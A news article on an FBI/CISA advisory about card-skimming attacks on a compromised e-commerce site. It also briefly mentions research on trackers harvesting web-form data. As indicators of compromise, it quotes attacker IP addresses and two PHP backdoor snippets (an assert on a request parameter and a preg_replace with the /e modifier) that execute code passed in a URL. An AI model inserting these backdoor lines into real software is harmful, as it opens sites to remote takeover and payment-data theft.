The FBI and friends have warned companies against scammers harvesting users’ credit card information from forged payment pages on compromised websites.
It’s an age-old problem: someone breaks into your online store and changes the code so that when your customers enter their information, copies of their data are siphoned off to be used by fraudsters. Federal authorities this week detailed one such effort that has been popping up lately.
As early as September 2020, we are told, criminals compromised at least one US company’s vulnerable website from three IP addresses: 80[.]249.207.19, 80[.]82.64.211 and 80[.]249.206.197. The intruders modified the TempOrders.php web script to attempt to inject malicious code into the checkout.php page.
In a review [PDF] from the FBI and CISA and Uncle Sam’s Homeland Security, from January 2022 code was injected into the payment page to retrieve payment details from customers and send it all to a server controlled by scammers posing as a legitimate card processing system.
As the FBI explained:
Additionally, the crooks modified files on the server of the infiltrated website to install two backdoors. One of these backdoors was a standard web shell – a page that executes commands on the remote system – which was deployed including the statement
assert($_REQUEST['login']) in a PHP page. This statement was exploited by visiting the spoofed page with the
login URL parameter set to the code that fetched and installed the web shell.
Miscreants also slipped code –
@preg_replace("/f/e",$_GET['u'],"fengjiao") – which appears to process a regular expression, and can be exploited to execute code provided in a URL parameter. These two code modifications were used to infiltrate the PHP PAS and b374 web shells on the victim’s server for other nefarious purposes.
You might want to check that the strings above are not present in your site’s PHP source code and that you haven’t logged the IP addresses in your logs. The FBI also recommends several measures to make your systems a less easy target for criminals.
These include regular software patches and updates, changing default login credentials, segmenting network systems to prevent lateral movement, monitoring traffic in your e-commerce environment to identify potential malicious activity and active analysis of web and application logs to detect unauthorized access and abnormal behavior.
Of course, criminals aren’t the only ones with a penchant for scraping data.
According to the researchers, tracking, marketing and analytics companies exfiltrated the email addresses – and sometimes passwords – of web users from web forms before they were submitted and without the user’s consent.
In a paper due to appear at the Usenix ’22 security conference later this year, authors Asuman Senol (imec-COSIC, KU Leuven), Gunes Acar (Radboud University), Mathias Humbert (University of Lausanne) and Frederik Zuiderveen Borgesius, (Radboud University) described how they measured data handling in web forms on the top 100,000 websites, as ranked by research site Tranco. ®